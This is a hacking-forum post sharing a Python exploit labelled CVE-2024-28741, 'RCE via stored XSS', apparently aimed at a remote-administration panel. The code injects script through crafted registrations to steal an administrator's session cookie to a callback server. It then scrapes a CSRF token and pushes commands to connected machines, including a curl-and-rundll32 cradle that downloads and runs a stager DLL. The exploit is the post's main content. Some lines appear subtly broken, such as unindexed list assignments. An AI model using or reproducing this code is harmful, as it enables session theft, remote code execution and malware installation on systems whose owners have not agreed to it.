GIMME HELL YEAH !!!

  • 💌Important Message to All Fellas💌

    💌Important Message to All Fellas : 💌

    ⚠️Thank you for being with us over the past year.
    To support our community, we're now offering an "Account Upgrade" for purchase.
    VIP and Legendary members get special direct downloads without needing to like or reply to threads. Upgrade now to enjoy these benefits!
    HERE Our Official Telegram

    ⛔ Spam: If someone try SCAM you or SPAM Message to you let me know we will ban them

    🏆 Download Error or Missing Link: Click on threads and report them to Our admin will re-upload for you.

    ☣️ Infected or Backdoor/RAT: If you find a virus, please report it to us via Telegram or click report in the threads, and we will completely ban them in 100%

    🎯 Our Plan : Make resource downloads on a private host without using another free upload because easy gone

    ❤️ We try our best to make everyone's shared tools clean and fresh in here, so enjoy with our fellas. ❤️

marsha677

Member
Mar 14, 2024
Threads
17
79
18
Credits
632
# Exploit Title: RCE via stored XSS
# Version: v1.0
# CVE: CVE-2024-28741

from http.server import BaseHTTPRequestHandler, HTTPServer
from bs4 import BeautifulSoup
import requests
import base64
import threading
import time
import os

class Collector(BaseHTTPRequestHandler):
def do_GET(self):
cookie = self.path.split("=")[1]
print("Cookie: " + cookie)
self.send_response(200)
self.end_headers()
self.wfile.write(b"")

background_thread = threading.Thread(target=steal_agents, args=(cookie,))
background_thread.start()

self.server.shutdown()

def agent_execute_command(agent_id, csrf_token, headers, command):
data = {
'slave': agent_id,
'command': command,
'sid': agent_id,
'token': csrf_token
}

r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)

while True:
r = requests.get(target_url + f"/getresponse.php?slave={agent_id}", headers=headers)
if len(r.text) != 0 or command == "die":
break

time.sleep(1)

def steal_agents(cookie):
headers = {
"Cookie": f"PHPSESSID={cookie}"
}
r = requests.get(target_url + "/clients.php", headers=headers)
soup = BeautifulSoup(r.text, 'html.parser')
rows = soup.find_all('tr')

agent_ids = []
hostnames = []

for row in rows:
cells = row.find_all('td')
if len(cells) != 9:
continue

status = cells[7].text.strip()
if status != 'Online':
continue

agent_ids.append(cells[1].text.strip())
hostnames.append(cells[5].text.strip())


script_tags = soup.find_all('script')

csrf_token = None
for script_tag in script_tags:
if 'csrfToken' in script_tag.text:
csrf_token = script_tag.text.split('"')[1]
break

if csrf_token:
print("CSRF Token:", csrf_token)
else:
print("CSRF Token not found")
return

for i in range(len(agent_ids)):
agent_id = agent_ids
hostname = hostnames
print(f"Stealing {hostname} ({agent_id})...")


print("Enabling shell mode")
agent_execute_command(agent_id, csrf_token, headers, "enablecmd")
print(f"Running sliver cradle: {cradle_command}")
agent_execute_command(agent_id, csrf_token, headers, cradle_command)
print("Disabling shell mode")
agent_execute_command(agent_id, csrf_token, headers, "disablecmd")
print("Sending suicide to slave")
agent_execute_command(agent_id, csrf_token, headers, "die")



print("Exploit finished, exiting")
os._exit(0)



def xor_encryption(text, key):
encrypted_text = ""

for i in range(len(text)):
encrypted_text += chr(ord(text) ^ ord(key[i % len(key)]))

return encrypted_text


def generate_sid(sid):
encrypted_sid = xor_encryption(sid, "northstar")


return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()

def exploit(target_url, callback_url):
target_url = target_url.rstrip("/") + "/login.php"


protocol = callback_url.split(":")[0] + "://"
host = callback_url.split("/")[2].split(":")[0]
h1, h2 = host[:len(host)//2], host[len(host)//2:]

if callback_url.count(":") == 2:
port = callback_url.split(":")[2]
else:
if protocol == "https://":
port = "443"
else:
port = "80"


sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]
for sid in sid_payloads:
print(sid)
params = {
'sid': generate_sid(sid)
}


requests.get(target_url, params=params, verify=False)

def run(port):
server_address = ('', int(port))
httpd = HTTPServer(server_address, Collector)
print(f'Server running on port {port}')
httpd.serve_forever()


cradle_command = r"curl
Please, Log in or Register to view URLs content!
> c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"


callback_host = "192.168.1.6"
callback_port = "8080"


target_url = "
Please, Log in or Register to view URLs content!
"
callback_url = f"http://{callback_host}:{callback_port}"


print("Sending malicious agent registrations...")
exploit(target_url, callback_url)
print("Registrations finished, waiting for execution...")
run(callback_port)
 
Last edited:

Forum statistics

Threads
1,775
Messages
35,463
Members
8,202
Latest member
Stole7161
Member time online
652d 10h 27m
Reputation(s)
26